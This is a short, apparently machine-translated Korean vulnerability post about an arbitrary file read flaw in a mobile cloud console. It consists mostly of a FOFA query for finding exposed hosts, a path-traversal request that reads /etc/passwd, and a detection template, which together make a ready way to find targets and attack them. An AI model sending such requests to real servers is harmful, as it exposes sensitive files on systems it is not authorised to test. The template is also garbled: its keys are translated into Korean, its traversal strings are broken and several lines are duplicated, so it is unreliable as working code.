모바일 클라우드 콘솔의 임의 파일 읽기 취약점
애플리케이션 보안 3464
모바일 클라우드 콘솔은 모바일 클라우드 제품 및 서비스를 통합적으로 조회하고 관리하는 데 사용되는 시스템으로, 모바일 클라우드 콘솔에 임의 파일 읽기 취약점이 있으며, 권한이 없는 공격자가 이를 악용하여 웹사이트 구성 파일과 같은 민감한 정보를 읽을 수 있습니다.
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
poc
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
호스트: ip
Yaml
ID: cmecloud-console-readfile
정보: 이름: cmecloud-console-readfile
이름: cmecloud-console-readfile
작성자: onewin
심각도: 높음
설명: 임의의 파일 읽기를 위한 모바일 클라우드 콘솔이 존재합니다.
http.
- raw.
- |+
시간 초과: 30초
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
호스트: {{호스트이름}}
일치자 조건: 및
일치자: {{호스트명}}
- type: status
상태: {{호스트이름}} matchers-condition: 및 일치자: 유형: 상태
- 200
- 유형: 단어
단어
- "root"
부분: 본문